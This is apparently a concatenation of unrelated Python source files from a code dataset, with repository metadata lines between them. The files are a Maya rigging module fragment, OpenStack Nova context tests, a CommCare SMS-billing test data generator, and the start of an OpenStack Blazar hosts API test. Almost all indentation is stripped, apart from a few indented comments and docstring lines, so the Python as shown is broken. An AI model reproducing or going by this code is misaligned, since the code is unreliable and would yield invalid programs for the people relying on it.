pm.connectAttr("%s.outputX" %multiplyTranslation, "%s.input1D[%d]" %(addNode, index), force = True)
return utilityNodes
def SetupModuleVisibility(self, _moduleGrp):
pm.select(_moduleGrp, replace = True)
pm.addAttr(attributeType = "byte", defaultValue = 1, minValue = 0, softMaxValue = 3, longName = "levelOfDetail", keyable = True)
moduleVisibilityMultiply = "%s:moduleVisibilityMultiply" %self.characterNamespace
pm.connectAttr("%s.outputX" %moduleVisibilityMultiply, "%s.visibility" %_moduleGrp, force = True)
def PublishNameToModuleContainer(self, _attribute, _attributeNiceName, _publishToOuterContainer = True):
if self.moduleContainer == None:
return
blueprintName = utils.StripLeadingNamespace(self.blueprintNamespace)[1].partition("__")[2]
attributePrefix = "%s_%s_" %(blueprintName, self.moduleNamespace)
publishedName = "%s%s" %(attributePrefix, _attributeNiceName)
if _publishToOuterContainer:
self.publishedNames.append(publishedName)
pm.container(self.moduleContainer, edit = True, publishAndBind = [_attribute, publishedName])
def PublishModuleContainerNamesToOuterContainers(self):
if self.moduleContainer == None:
return
characterContainer = "%s:character_container" %self.characterNamespace
blueprintContainer = "%s:module_container" %self.blueprintNamespace
for publishedNames in self.publishedNames:
outerPublishedNames = pm.container(blueprintContainer, query = True, publishName = True)
if publishedNames in outerPublishedNames:
continue
pm.container(blueprintContainer, edit = True, publishAndBind = ["%s.%s" %(self.moduleContainer, publishedNames), publishedNames])
pm.container(characterContainer, edit = True, publishAndBind = ["%s.%s" %(blueprintContainer, publishedNames), publishedNames])
def Uninstall(self):
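        # Reverses Install(): unbinds published names, deletes the module
        # container, removes this module's weight attribute and enum entry
        # from the SETTINGS locator, and restores creation-pose weighting.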
characterContainer = "%s:character_container" %self.characterNamespace
blueprintContainer = "%s:module_container" %self.blueprintNamespace
moduleContainer = self.moduleContainer
containers = [characterContainer, blueprintContainer, moduleContainer]
for c in containers:
pm.lockNode(c, lock = False, lockUnpublished = False)
containers.pop()
blueprintJointsGrp = "%s:blueprint_joints_grp" %self.blueprintNamespace
blueprintJoints = utils.FindJointChain(blueprintJointsGrp)
blueprintJoints.pop(0)
settingsLocator = "%s:SETTINGS" %self.blueprintNamespace
connections = pm.listConnections("%s_addRotations" %blueprintJoints[0], source = True, destination = False)
if len(connections) == 2:
pm.setAttr("%s.controlModulesInstalled" %blueprintJointsGrp, False)
publishedNames = pm.container(moduleContainer, query = True, publishName = True)
publishedNames.sort()
for name in publishedNames:
outerPublishedNames = pm.container(characterContainer, query = True, publishName = True)
if name in outerPublishedNames:
pm.container(characterContainer, edit = True, unbindAndUnpublish = "%s.%s" %(blueprintContainer, name))
pm.container(blueprintContainer, edit = True, unbindAndUnpublish = "%s.%s" %(moduleContainer, name))
pm.delete(moduleContainer)
weightAttributeName = "%s_weight" %self.moduleNamespace
pm.deleteAttr("%s.%s" %(settingsLocator, weightAttributeName))
attributes = pm.listAttr(settingsLocator, keyable = False)
weightAttributes = []
for attr in attributes:
if attr.find("_weight") != -1:
weightAttributes.append(attr)
totalWeight = 0
for attr in weightAttributes:
totalWeight += pm.getAttr("%s.%s" %(settingsLocator, attr))
pm.setAttr("%s.creationPoseWeight" %settingsLocator, 1-totalWeight)
currentEntries = pm.attributeQuery("activeModule", node = settingsLocator, listEnum = True)
currentEntriesList = currentEntries[0].split(":")
ourEntry = self.moduleNamespace
currentEntriesString = ""
for entry in currentEntriesList:
if entry != ourEntry:
currentEntriesString += "%s:" %entry
if currentEntriesString == "":
currentEntriesString = "None"
pm.addAttr("%s.activeModule" %settingsLocator, edit = True, enumName = currentEntriesString)
pm.setAttr("%s.activeModule" %settingsLocator, 0)
pm.namespace(setNamespace = self.blueprintNamespace)
pm.namespace(removeNamespace = self.moduleNamespace)
pm.namespace(setNamespace = ":")
for c in containers:
pm.lockNode(c, lock = True, lockUnpublished = True)
|
mit
| 7,539,544,142,091,455,000 | 34.840659 | 164 | 0.722269 | false |
gooddata/openstack-nova
|
nova/tests/unit/test_context.py
|
1
|
22297
|
# Copyright 2011 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from oslo_context import context as o_context
from oslo_context import fixture as o_fixture
from oslo_utils.fixture import uuidsentinel as uuids
from nova import context
from nova import exception
from nova import objects
from nova import test
from nova.tests import fixtures as nova_fixtures
class ContextTestCase(test.NoDBTestCase):
# NOTE(danms): Avoid any cells setup by claiming we will
# do things ourselves.
USES_DB_SELF = True
def setUp(self):
super(ContextTestCase, self).setUp()
self.useFixture(o_fixture.ClearRequestContext())
def test_request_context_elevated(self):
user_ctxt = context.RequestContext('111',
'222',
is_admin=False)
self.assertFalse(user_ctxt.is_admin)
admin_ctxt = user_ctxt.elevated()
self.assertTrue(admin_ctxt.is_admin)
self.assertIn('admin', admin_ctxt.roles)
self.assertFalse(user_ctxt.is_admin)
self.assertNotIn('admin', user_ctxt.roles)
def test_request_context_sets_is_admin(self):
ctxt = context.RequestContext('111',
'222',
roles=['admin', 'weasel'])
self.assertTrue(ctxt.is_admin)
def test_request_context_sets_is_admin_by_role(self):
ctxt = context.RequestContext('111',
'222',
roles=['administrator'])
self.assertTrue(ctxt.is_admin)
def test_request_context_sets_is_admin_upcase(self):
ctxt = context.RequestContext('111',
'222',
roles=['Admin', 'weasel'])
self.assertTrue(ctxt.is_admin)
def test_request_context_read_deleted(self):
ctxt = context.RequestContext('111',
'222',
read_deleted='yes')
self.assertEqual('yes', ctxt.read_deleted)
ctxt.read_deleted = 'no'
self.assertEqual('no', ctxt.read_deleted)
def test_request_context_read_deleted_invalid(self):
self.assertRaises(ValueError,
context.RequestContext,
'111',
'222',
read_deleted=True)
ctxt = context.RequestContext('111', '222')
self.assertRaises(ValueError,
setattr,
ctxt,
'read_deleted',
True)
def test_service_catalog_default(self):
ctxt = context.RequestContext('111', '222')
self.assertEqual([], ctxt.service_catalog)
ctxt = context.RequestContext('111', '222',
service_catalog=[])
self.assertEqual([], ctxt.service_catalog)
ctxt = context.RequestContext('111', '222',
service_catalog=None)
self.assertEqual([], ctxt.service_catalog)
def test_service_catalog_filter(self):
service_catalog = [
{u'type': u'compute', u'name': u'nova'},
{u'type': u's3', u'name': u's3'},
{u'type': u'image', u'name': u'glance'},
{u'type': u'volumev3', u'name': u'cinderv3'},
{u'type': u'network', u'name': u'neutron'},
{u'type': u'ec2', u'name': u'ec2'},
{u'type': u'object-store', u'name': u'swift'},
{u'type': u'identity', u'name': u'keystone'},
{u'type': u'block-storage', u'name': u'cinder'},
{u'type': None, u'name': u'S_withouttype'},
{u'type': u'vo', u'name': u'S_partofvolume'}]
volume_catalog = [{u'type': u'image', u'name': u'glance'},
{u'type': u'volumev3', u'name': u'cinderv3'},
{u'type': u'network', u'name': u'neutron'},
{u'type': u'block-storage', u'name': u'cinder'}]
ctxt = context.RequestContext('111', '222',
service_catalog=service_catalog)
self.assertEqual(volume_catalog, ctxt.service_catalog)
def test_to_dict_from_dict_no_log(self):
warns = []
def stub_warn(msg, *a, **kw):
if (a and len(a) == 1 and isinstance(a[0], dict) and a[0]):
a = a[0]
warns.append(str(msg) % a)
self.stub_out('nova.context.LOG.warning', stub_warn)
ctxt = context.RequestContext('111',
'222',
roles=['admin', 'weasel'])
context.RequestContext.from_dict(ctxt.to_dict())
self.assertEqual(0, len(warns), warns)
def test_store_when_no_overwrite(self):
# If no context exists we store one even if overwrite is false
# (since we are not overwriting anything).
ctx = context.RequestContext('111',
'222',
overwrite=False)
self.assertIs(o_context.get_current(), ctx)
def test_no_overwrite(self):
# If there is already a context in the cache a new one will
# not overwrite it if overwrite=False.
ctx1 = context.RequestContext('111',
'222',
overwrite=True)
context.RequestContext('333',
'444',
overwrite=False)
self.assertIs(o_context.get_current(), ctx1)
def test_get_context_no_overwrite(self):
# If there is already a context in the cache creating another context
# should not overwrite it.
ctx1 = context.RequestContext('111',
'222',
overwrite=True)
context.get_context()
self.assertIs(ctx1, o_context.get_current())
def test_admin_no_overwrite(self):
# If there is already a context in the cache creating an admin
# context will not overwrite it.
ctx1 = context.RequestContext('111',
'222',
overwrite=True)
context.get_admin_context()
self.assertIs(o_context.get_current(), ctx1)
def test_convert_from_rc_to_dict(self):
ctx = context.RequestContext(
111, 222, request_id='req-679033b7-1755-4929-bf85-eb3bfaef7e0b',
timestamp='2015-03-02T22:31:56.641629')
values2 = ctx.to_dict()
expected_values = {'auth_token': None,
'domain': None,
'is_admin': False,
'is_admin_project': True,
'project_id': 222,
'project_domain': None,
'project_name': None,
'quota_class': None,
'read_deleted': 'no',
'read_only': False,
'remote_address': None,
'request_id':
'req-679033b7-1755-4929-bf85-eb3bfaef7e0b',
'resource_uuid': None,
'roles': [],
'service_catalog': [],
'show_deleted': False,
'tenant': 222,
'timestamp': '2015-03-02T22:31:56.641629',
'user': 111,
'user_domain': None,
'user_id': 111,
'user_identity': '111 222 - - -',
'user_name': None}
for k, v in expected_values.items():
self.assertIn(k, values2)
self.assertEqual(values2[k], v)
@mock.patch.object(context.policy, 'authorize')
def test_can(self, mock_authorize):
mock_authorize.return_value = True
ctxt = context.RequestContext('111', '222')
result = ctxt.can(mock.sentinel.rule)
self.assertTrue(result)
mock_authorize.assert_called_once_with(
ctxt, mock.sentinel.rule,
{'project_id': ctxt.project_id, 'user_id': ctxt.user_id})
@mock.patch.object(context.policy, 'authorize')
def test_can_fatal(self, mock_authorize):
mock_authorize.side_effect = exception.Forbidden
ctxt = context.RequestContext('111', '222')
self.assertRaises(exception.Forbidden,
ctxt.can, mock.sentinel.rule)
@mock.patch.object(context.policy, 'authorize')
def test_can_non_fatal(self, mock_authorize):
mock_authorize.side_effect = exception.Forbidden
ctxt = context.RequestContext('111', '222')
result = ctxt.can(mock.sentinel.rule, mock.sentinel.target,
fatal=False)
self.assertFalse(result)
mock_authorize.assert_called_once_with(ctxt, mock.sentinel.rule,
mock.sentinel.target)
@mock.patch('nova.rpc.create_transport')
@mock.patch('nova.db.api.create_context_manager')
def test_target_cell(self, mock_create_ctxt_mgr, mock_rpc):
mock_create_ctxt_mgr.return_value = mock.sentinel.cdb
mock_rpc.return_value = mock.sentinel.cmq
ctxt = context.RequestContext('111',
'222',
roles=['admin', 'weasel'])
# Verify the existing db_connection, if any, is restored
ctxt.db_connection = mock.sentinel.db_conn
ctxt.mq_connection = mock.sentinel.mq_conn
mapping = objects.CellMapping(database_connection='fake://',
transport_url='fake://',
uuid=uuids.cell)
with context.target_cell(ctxt, mapping) as cctxt:
self.assertEqual(cctxt.db_connection, mock.sentinel.cdb)
self.assertEqual(cctxt.mq_connection, mock.sentinel.cmq)
self.assertEqual(cctxt.cell_uuid, mapping.uuid)
self.assertEqual(mock.sentinel.db_conn, ctxt.db_connection)
self.assertEqual(mock.sentinel.mq_conn, ctxt.mq_connection)
self.assertIsNone(ctxt.cell_uuid)
# Test again now that we have populated the cache
with context.target_cell(ctxt, mapping) as cctxt:
self.assertEqual(cctxt.db_connection, mock.sentinel.cdb)
self.assertEqual(cctxt.mq_connection, mock.sentinel.cmq)
self.assertEqual(cctxt.cell_uuid, mapping.uuid)
@mock.patch('nova.rpc.create_transport')
@mock.patch('nova.db.api.create_context_manager')
def test_target_cell_unset(self, mock_create_ctxt_mgr, mock_rpc):
"""Tests that passing None as the mapping will temporarily
untarget any previously set cell context.
"""
mock_create_ctxt_mgr.return_value = mock.sentinel.cdb
mock_rpc.return_value = mock.sentinel.cmq
ctxt = context.RequestContext('111',
'222',
roles=['admin', 'weasel'])
ctxt.db_connection = mock.sentinel.db_conn
ctxt.mq_connection = mock.sentinel.mq_conn
with context.target_cell(ctxt, None) as cctxt:
self.assertIsNone(cctxt.db_connection)
self.assertIsNone(cctxt.mq_connection)
self.assertEqual(mock.sentinel.db_conn, ctxt.db_connection)
self.assertEqual(mock.sentinel.mq_conn, ctxt.mq_connection)
@mock.patch('nova.context.set_target_cell')
def test_target_cell_regenerates(self, mock_set):
ctxt = context.RequestContext('fake', 'fake')
# Set a non-tracked property on the context to make sure it
# does not make it to the targeted one (like a copy would do)
ctxt.sentinel = mock.sentinel.parent
with context.target_cell(ctxt, mock.sentinel.cm) as cctxt:
# Should be a different object
self.assertIsNot(cctxt, ctxt)
# Should not have inherited the non-tracked property
self.assertFalse(hasattr(cctxt, 'sentinel'),
'Targeted context was copied from original')
# Set another non-tracked property
cctxt.sentinel = mock.sentinel.child
# Make sure we didn't pollute the original context
self.assertNotEqual(ctxt.sentinel, mock.sentinel.child)
def test_get_context(self):
ctxt = context.get_context()
self.assertIsNone(ctxt.user_id)
self.assertIsNone(ctxt.project_id)
self.assertFalse(ctxt.is_admin)
@mock.patch('nova.rpc.create_transport')
@mock.patch('nova.db.api.create_context_manager')
def test_target_cell_caching(self, mock_create_cm, mock_create_tport):
mock_create_cm.return_value = mock.sentinel.db_conn_obj
mock_create_tport.return_value = mock.sentinel.mq_conn_obj
ctxt = context.get_context()
mapping = objects.CellMapping(database_connection='fake://db',
transport_url='fake://mq',
uuid=uuids.cell)
# First call should create new connection objects.
with context.target_cell(ctxt, mapping) as cctxt:
self.assertEqual(mock.sentinel.db_conn_obj, cctxt.db_connection)
self.assertEqual(mock.sentinel.mq_conn_obj, cctxt.mq_connection)
mock_create_cm.assert_called_once_with('fake://db')
mock_create_tport.assert_called_once_with('fake://mq')
# Second call should use cached objects.
mock_create_cm.reset_mock()
mock_create_tport.reset_mock()
with context.target_cell(ctxt, mapping) as cctxt:
self.assertEqual(mock.sentinel.db_conn_obj, cctxt.db_connection)
self.assertEqual(mock.sentinel.mq_conn_obj, cctxt.mq_connection)
mock_create_cm.assert_not_called()
mock_create_tport.assert_not_called()
@mock.patch('nova.context.target_cell')
@mock.patch('nova.objects.InstanceList.get_by_filters')
def test_scatter_gather_cells(self, mock_get_inst, mock_target_cell):
ctxt = context.get_context()
mapping = objects.CellMapping(database_connection='fake://db',
transport_url='fake://mq',
uuid=uuids.cell)
mappings = objects.CellMappingList(objects=[mapping])
# Use a mock manager to assert call order across mocks.
manager = mock.Mock()
manager.attach_mock(mock_get_inst, 'get_inst')
manager.attach_mock(mock_target_cell, 'target_cell')
filters = {'deleted': False}
context.scatter_gather_cells(
ctxt, mappings, 60, objects.InstanceList.get_by_filters, filters,
sort_dir='foo')
# NOTE(melwitt): This only works without the SpawnIsSynchronous fixture
# because when the spawn is treated as synchronous and the thread
# function is called immediately, it will occur inside the target_cell
# context manager scope when it wouldn't with a real spawn.
# Assert that InstanceList.get_by_filters was called before the
# target_cell context manager exited.
get_inst_call = mock.call.get_inst(
mock_target_cell.return_value.__enter__.return_value, filters,
sort_dir='foo')
expected_calls = [get_inst_call,
mock.call.target_cell().__exit__(None, None, None)]
manager.assert_has_calls(expected_calls)
@mock.patch('nova.context.LOG.warning')
@mock.patch('eventlet.timeout.Timeout')
@mock.patch('eventlet.queue.LightQueue.get')
@mock.patch('nova.objects.InstanceList.get_by_filters')
def test_scatter_gather_cells_timeout(self, mock_get_inst,
mock_get_result, mock_timeout,
mock_log_warning):
# This is needed because we're mocking get_by_filters.
self.useFixture(nova_fixtures.SpawnIsSynchronousFixture())
ctxt = context.get_context()
mapping0 = objects.CellMapping(database_connection='fake://db0',
transport_url='none:///',
uuid=objects.CellMapping.CELL0_UUID)
mapping1 = objects.CellMapping(database_connection='fake://db1',
transport_url='fake://mq1',
uuid=uuids.cell1)
mappings = objects.CellMappingList(objects=[mapping0, mapping1])
# Simulate cell1 not responding.
mock_get_result.side_effect = [(mapping0.uuid,
mock.sentinel.instances),
exception.CellTimeout()]
results = context.scatter_gather_cells(
ctxt, mappings, 30, objects.InstanceList.get_by_filters)
self.assertEqual(2, len(results))
self.assertIn(mock.sentinel.instances, results.values())
self.assertIn(context.did_not_respond_sentinel, results.values())
mock_timeout.assert_called_once_with(30, exception.CellTimeout)
self.assertTrue(mock_log_warning.called)
@mock.patch('nova.context.LOG.exception')
@mock.patch('nova.objects.InstanceList.get_by_filters')
def test_scatter_gather_cells_exception(self, mock_get_inst,
mock_log_exception):
# This is needed because we're mocking get_by_filters.
self.useFixture(nova_fixtures.SpawnIsSynchronousFixture())
ctxt = context.get_context()
mapping0 = objects.CellMapping(database_connection='fake://db0',
transport_url='none:///',
uuid=objects.CellMapping.CELL0_UUID)
mapping1 = objects.CellMapping(database_connection='fake://db1',
transport_url='fake://mq1',
uuid=uuids.cell1)
mappings = objects.CellMappingList(objects=[mapping0, mapping1])
# Simulate cell1 raising an exception.
mock_get_inst.side_effect = [mock.sentinel.instances,
test.TestingException()]
results = context.scatter_gather_cells(
ctxt, mappings, 30, objects.InstanceList.get_by_filters)
self.assertEqual(2, len(results))
self.assertIn(mock.sentinel.instances, results.values())
self.assertIn(context.raised_exception_sentinel, results.values())
self.assertTrue(mock_log_exception.called)
@mock.patch('nova.context.scatter_gather_cells')
@mock.patch('nova.objects.CellMappingList.get_all')
def test_scatter_gather_all_cells(self, mock_get_all, mock_scatter):
ctxt = context.get_context()
mapping0 = objects.CellMapping(database_connection='fake://db0',
transport_url='none:///',
uuid=objects.CellMapping.CELL0_UUID)
mapping1 = objects.CellMapping(database_connection='fake://db1',
transport_url='fake://mq1',
uuid=uuids.cell1)
mock_get_all.return_value = objects.CellMappingList(
objects=[mapping0, mapping1])
filters = {'deleted': False}
context.scatter_gather_all_cells(
ctxt, objects.InstanceList.get_by_filters, filters, sort_dir='foo')
mock_scatter.assert_called_once_with(
ctxt, mock_get_all.return_value, 60,
objects.InstanceList.get_by_filters, filters, sort_dir='foo')
@mock.patch('nova.context.scatter_gather_cells')
@mock.patch('nova.objects.CellMappingList.get_all')
def test_scatter_gather_skip_cell0(self, mock_get_all, mock_scatter):
ctxt = context.get_context()
mapping0 = objects.CellMapping(database_connection='fake://db0',
transport_url='none:///',
uuid=objects.CellMapping.CELL0_UUID)
mapping1 = objects.CellMapping(database_connection='fake://db1',
transport_url='fake://mq1',
uuid=uuids.cell1)
mock_get_all.return_value = objects.CellMappingList(
objects=[mapping0, mapping1])
filters = {'deleted': False}
context.scatter_gather_skip_cell0(
ctxt, objects.InstanceList.get_by_filters, filters, sort_dir='foo')
mock_scatter.assert_called_once_with(
ctxt, [mapping1], 60, objects.InstanceList.get_by_filters, filters,
sort_dir='foo')
@mock.patch('nova.context.scatter_gather_cells')
def test_scatter_gather_single_cell(self, mock_scatter):
ctxt = context.get_context()
mapping0 = objects.CellMapping(database_connection='fake://db0',
transport_url='none:///',
uuid=objects.CellMapping.CELL0_UUID)
filters = {'deleted': False}
context.scatter_gather_single_cell(ctxt, mapping0,
objects.InstanceList.get_by_filters, filters, sort_dir='foo')
mock_scatter.assert_called_once_with(
ctxt, [mapping0], context.CELL_TIMEOUT,
objects.InstanceList.get_by_filters, filters,
sort_dir='foo')
|
apache-2.0
| 8,326,044,055,298,230,000 | 45.068182 | 79 | 0.562407 | false |
qedsoftware/commcare-hq
|
corehq/apps/smsbillables/tests/generator.py
|
1
|
10417
|
import calendar
import random
import datetime
import string
import uuid
from collections import namedtuple
from decimal import Decimal
from dimagi.utils.data import generator as data_gen
from corehq.apps.accounting.models import Currency
from corehq.apps.sms.models import INCOMING, OUTGOING, SMS
from corehq.apps.sms.util import get_sms_backend_classes
from corehq.apps.smsbillables.models import SmsBillable, SmsGatewayFee, SmsUsageFee
from corehq.messaging.smsbackends.twilio.models import SQLTwilioBackend
from corehq.util.test_utils import unit_testing_only
# arbitrarily generated once from http://www.generatedata.com/
SMS_MESSAGE_CONTENT = [
"Nullam scelerisque neque sed sem", "non massa non ante bibendum", "lectus, a sollicitudin orci sem",
"felis, adipiscing fringilla, porttitor vulputate", "nibh. Phasellus nulla. Integer vulputate",
"pede, malesuada vel, venenatis vel", "molestie arcu. Sed eu nibh", "non nisi. Aenean eget metus.",
"luctus. Curabitur egestas nunc sed", "risus. Nulla eget metus eu", "penatibus et magnis dis parturient",
"malesuada ut, sem. Nulla interdum.", "diam luctus lobortis. Class aptent", "enim. Nunc ut erat. Sed",
"pede. Praesent eu dui. Cum", "Duis ac arcu. Nunc mauris.", "vel nisl. Quisque fringilla euismod",
"consequat purus. Maecenas libero est", "ultrices posuere cubilia Curae; Donec", "hymenaeos. Mauris ut quam vel",
"dolor quam, elementum at, egestas", "Praesent eu dui. Cum sociis", "nisl. Quisque fringilla euismod enim.",
"nunc, ullamcorper eu, euismod ac", "varius orci, in consequat enim", "convallis ligula. Donec luctus aliquet"
]
TEST_DOMAIN = "test"
TEST_NUMBER = "16175005454"
TEST_COUNTRY_CODES = (1, 20, 30, 220, 501)
OTHER_COUNTRY_CODES = (31, 40, 245, 502)
DIRECTIONS = [INCOMING, OUTGOING]
CountryPrefixPair = namedtuple('CountryPrefixPair', ['country_code', 'prefix'])
@unit_testing_only
def arbitrary_message():
return random.choice(SMS_MESSAGE_CONTENT)
@unit_testing_only
def arbitrary_fee():
return Decimal(str(round(random.uniform(0.0, 1.0), 4)))
@unit_testing_only
def _generate_prefixes(country_code, max_prefix_length, num_prefixes_per_size):
def _generate_prefix(cc, existing_prefixes, i):
while True:
prefix = existing_prefixes[-1 - i] + str(random.randint(0 if cc != 1 else 2, 9))
if prefix not in existing_prefixes:
return prefix
prefixes = [""]
for _ in range(max_prefix_length):
for i in range(num_prefixes_per_size):
prefixes.append(_generate_prefix(country_code, prefixes, i))
return prefixes
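# Illustrative only (actual digits are random): _generate_prefixes(20, 2, 2)
# could return ["", "4", "7", "73", "75"] -- the empty prefix plus
# `num_prefixes_per_size` unique prefixes for each length up to
# `max_prefix_length`, each built by appending one random digit to a recently
# generated shorter prefix.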
@unit_testing_only
def arbitrary_country_code_and_prefixes(
max_prefix_length, num_prefixes_per_size,
country_codes=TEST_COUNTRY_CODES
):
return [
CountryPrefixPair(str(country_code), prefix)
for country_code in country_codes
for prefix in _generate_prefixes(country_code, max_prefix_length, num_prefixes_per_size)
]
@unit_testing_only
def _available_gateway_fee_backends():
return filter(
lambda backend: backend.get_api_id() != SQLTwilioBackend.get_api_id(),
get_sms_backend_classes().values()
)
@unit_testing_only
def arbitrary_fees_by_prefix(backend_ids, country_codes_and_prefixes):
fees = {}
for direction in DIRECTIONS:
fees_by_backend = {}
for backend in _available_gateway_fee_backends():
fees_by_country_code = {}
for country_code, _ in country_codes_and_prefixes:
fees_by_country_code[country_code] = {}
for country_code, prefix in country_codes_and_prefixes:
fees_by_prefix = {
backend_instance: arbitrary_fee()
for backend_instance in [backend_ids[backend.get_api_id()], None]
}
fees_by_country_code[country_code][prefix] = fees_by_prefix
fees_by_backend[backend.get_api_id()] = fees_by_country_code
fees[direction] = fees_by_backend
return fees
@unit_testing_only
def arbitrary_phone_number(country_codes=TEST_COUNTRY_CODES):
return str(random.choice(country_codes)) + str(random.randint(10**9, 10**10 - 1))
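# e.g. (hypothetical draw) '20' + '4936271805' -> '204936271805': a random
# country code from `country_codes` followed by a random ten-digit national
# number.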
@unit_testing_only
def arbitrary_domain(length=25):
return ''.join(random.choice(string.ascii_lowercase) for i in range(length))
@unit_testing_only
def arbitrary_fees_by_direction():
fees = {}
for direction in DIRECTIONS:
fees[direction] = arbitrary_fee()
return fees
@unit_testing_only
def arbitrary_fees_by_direction_and_domain():
domains = [arbitrary_domain() for i in range(10)]
fees = {}
for direction in DIRECTIONS:
fees_by_domain = {}
for domain in domains:
fees_by_domain[domain] = arbitrary_fee()
fees[direction] = fees_by_domain
return fees
@unit_testing_only
def arbitrary_fees_by_direction_and_backend():
fees = {}
for direction in DIRECTIONS:
fees_by_backend = {}
for backend in _available_gateway_fee_backends():
fees_by_backend[backend.get_api_id()] = arbitrary_fee()
fees[direction] = fees_by_backend
return fees
@unit_testing_only
def arbitrary_fees_by_country():
fees = {}
for direction in DIRECTIONS:
fees_by_backend = {}
for backend in _available_gateway_fee_backends():
fees_by_country = {}
for country in TEST_COUNTRY_CODES:
fees_by_country[country] = arbitrary_fee()
fees_by_backend[backend.get_api_id()] = fees_by_country
fees[direction] = fees_by_backend
return fees
@unit_testing_only
def arbitrary_fees_by_backend_instance(backend_ids):
fees = {}
for direction in DIRECTIONS:
fees_by_backend = {}
for backend in _available_gateway_fee_backends():
fees_by_backend[backend.get_api_id()] = (backend_ids[backend.get_api_id()], arbitrary_fee())
fees[direction] = fees_by_backend
return fees
@unit_testing_only
def arbitrary_fees_by_all(backend_ids):
fees = {}
for direction in DIRECTIONS:
fees_by_backend = {}
for backend in _available_gateway_fee_backends():
fees_by_country = {}
for country in TEST_COUNTRY_CODES:
fees_by_country[country] = (backend_ids[backend.get_api_id()], arbitrary_fee())
fees_by_backend[backend.get_api_id()] = fees_by_country
fees[direction] = fees_by_backend
return fees
@unit_testing_only
def arbitrary_backend_ids():
backend_ids = {}
for backend in _available_gateway_fee_backends():
backend_instance = data_gen.arbitrary_unique_name("back")
backend_ids[backend.get_api_id()] = backend_instance
sms_backend = backend()
sms_backend.hq_api_id = backend.get_api_id()
sms_backend.couch_id = backend_instance
sms_backend.name = backend_instance
sms_backend.is_global = True
sms_backend.save()
return backend_ids
@unit_testing_only
def arbitrary_messages_by_backend_and_direction(backend_ids,
phone_number=None,
domain=None,
directions=None):
phone_number = phone_number or TEST_NUMBER
domain = domain or TEST_DOMAIN
directions = directions or DIRECTIONS
messages = []
for api_id, instance_id in backend_ids.items():
for direction in directions:
sms_log = SMS(
direction=direction,
phone_number=phone_number,
domain=domain,
backend_api=api_id,
backend_id=instance_id,
backend_message_id=uuid.uuid4().hex,
text=arbitrary_message(),
date=datetime.datetime.utcnow()
)
sms_log.save()
messages.append(sms_log)
return messages
@unit_testing_only
def arbitrary_currency():
return Currency.objects.get_or_create(
code='OTH',
defaults={
            'rate_to_default': Decimal('%.5f' % random.uniform(0.5, 2.0)),  # '%.5f', not '%5.f': keep the fractional part of the rate
},
)[0]
@unit_testing_only
def arbitrary_phone_numbers_and_prefixes(country_code_and_prefixes):
country_code_to_prefixes = {}
for country_code, prefix in country_code_and_prefixes:
if country_code not in country_code_to_prefixes:
country_code_to_prefixes[country_code] = []
country_code_to_prefixes[country_code].append(prefix)
for country_code, prefix in country_code_and_prefixes:
remainder_len = 10 - len(prefix)
def _get_national_number():
return prefix + str(random.randint(
(1 if prefix else 2) * (10 ** (remainder_len - 1)),
(10 ** remainder_len) - 1
))
while True:
national_number = _get_national_number()
if not any(
national_number.startswith(another_prefix) and another_prefix.startswith(prefix)
for another_prefix in country_code_to_prefixes[country_code]
if another_prefix and another_prefix != prefix
):
yield (
country_code + national_number,
prefix
)
break
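# Minimal usage sketch (assumed call pattern; values are hypothetical):
#   pairs = arbitrary_country_code_and_prefixes(max_prefix_length=2,
#                                               num_prefixes_per_size=2)
#   for number, prefix in arbitrary_phone_numbers_and_prefixes(pairs):
#       ...  # `number` starts with country_code + prefix and matches no other
#            # sibling prefix, so prefix-based gateway-fee lookups stay unambiguous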
@unit_testing_only
def arbitrary_sms_billables_for_domain(domain, message_month_date, num_sms, direction=None, multipart_count=1):
direction = direction or random.choice(DIRECTIONS)
gateway_fee = SmsGatewayFee.create_new('MACH', direction, Decimal(0.5))
usage_fee = SmsUsageFee.create_new(direction, Decimal(0.25))
_, last_day_message = calendar.monthrange(message_month_date.year, message_month_date.month)
billables = []
for _ in range(0, num_sms):
sms_billable = SmsBillable(
gateway_fee=gateway_fee,
usage_fee=usage_fee,
log_id=data_gen.arbitrary_unique_name()[:50],
phone_number=data_gen.random_phonenumber(),
domain=domain,
direction=direction,
date_sent=datetime.date(message_month_date.year, message_month_date.month,
random.randint(1, last_day_message)),
multipart_count=multipart_count,
)
sms_billable.save()
billables.append(sms_billable)
return billables
|
bsd-3-clause
| 2,373,299,158,017,722,400 | 34.431973 | 117 | 0.633388 | false |
openstack/blazar
|
blazar/tests/api/v1/oshosts/test_v1_0.py
|
1
|
10633
|
# Copyright (c) 2013 Bull.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import ddt
import flask
from oslo_utils import uuidutils
from testtools import matchers
from oslo_middleware import request_id as id
from blazar.api import context as api_context
from blazar.api.v1 import api_version_request
from blazar.api.v1.oshosts import service as service_api
from blazar.api.v1.oshosts import v1_0 as hosts_api_v1_0
from blazar.api.v1 import request_id
from blazar.api.v1 import request_log
from blazar import context
from blazar import tests
def make_app():
"""App builder (wsgi).
Entry point for Blazar REST API server.
"""
app = flask.Flask('blazar.api')
app.register_blueprint(hosts_api_v1_0.rest, url_prefix='/v1')
app.wsgi_app = request_id.BlazarReqIdMiddleware(app.wsgi_app)
app.wsgi_app = request_log.RequestLog(app.wsgi_app)
return app
def fake_computehost(**kw):
return {
'id': kw.get('id', '1'),
'hypervisor_hostname': kw.get('hypervisor_hostname', 'host01'),
'hypervisor_type': kw.get('hypervisor_type', 'QEMU'),
'vcpus': kw.get('vcpus', 1),
'hypervisor_version': kw.get('hypervisor_version', 1000000),
'trust_id': kw.get('trust_id',
'35b17138-b364-4e6a-a131-8f3099c5be68'),
'memory_mb': kw.get('memory_mb', 8192),
'local_gb': kw.get('local_gb', 50),
'cpu_info': kw.get('cpu_info',
"{\"vendor\": \"Intel\", \"model\": \"qemu32\", "
"\"arch\": \"x86_64\", \"features\": [],"
" \"topology\": {\"cores\": 1}}",
),
